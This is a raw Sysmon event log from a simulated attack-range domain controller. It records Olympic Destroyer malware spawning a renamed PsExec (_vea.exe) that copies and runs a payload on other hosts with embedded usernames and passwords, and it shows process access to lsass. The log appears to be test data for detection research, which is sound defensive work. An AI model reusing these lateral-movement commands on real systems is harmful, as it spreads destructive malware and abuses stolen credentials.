10:57:21.244{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292836Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.244{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1311-6216-3706-000000003802}4484C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292835Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.244{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{C8EA50B7-1311-6216-3706-000000003802}4484C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292834Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.246{C8EA50B7-1311-6216-3706-000000003802}4484C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292833Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.244{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1311-6216-3706-000000003802}4484C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292832Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.128{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1311-6216-3606-000000003802}836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292831Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.128{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292830Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.128{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292829Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.128{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292828Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.128{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292827Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.128{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1311-6216-3506-000000003802}5312C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292826Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.128{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1311-6216-3606-000000003802}836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292825Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.128{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292824Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.128{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292823Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.127{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292822Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.127{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292821Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.126{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1311-6216-3606-000000003802}836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000292820Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.125{C8EA50B7-1311-6216-3606-000000003802}836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000292819Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.124{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-1311-6216-3506-000000003802}5312C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292818Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.124{C8EA50B7-1311-6216-3506-000000003802}5312C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292817Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.124{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1311-6216-3506-000000003802}5312C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292816Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.006{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F3E3B467462B76124D8AAC0138A10C6,SHA256=4DA1AA42E48BBCDB38355B07DD8024FE463B887C61A3D17634B1611425B67705,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217803Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:22.305{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EA0E11C700EDC3C93AA6CE919E9D459,SHA256=903B8D05B595420F350E626FE031E1B327850E7BEF37D8B341C09FA03ACED01A,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000292911Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:22.328{C8EA50B7-1312-6216-3E06-000000003802}516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292910Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:22.328{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1312-6216-3E06-000000003802}516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292909Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:22.328{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1312-6216-3E06-000000003802}516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292908Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:22.306{C8EA50B7-1312-6216-3E06-000000003802}516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292907Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:22.259{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1312-6216-3F06-000000003802}6404C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292906Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:22.259{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1312-6216-3F06-000000003802}6404C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292905Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:22.244{C8EA50B7-1312-6216-3F06-000000003802}64046104C:\Windows\system32\conhost.exe{C8EA50B7-1312-6216-3E06-000000003802}516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292904Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:22.206{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1312-6216-3F06-000000003802}6404C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292903Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 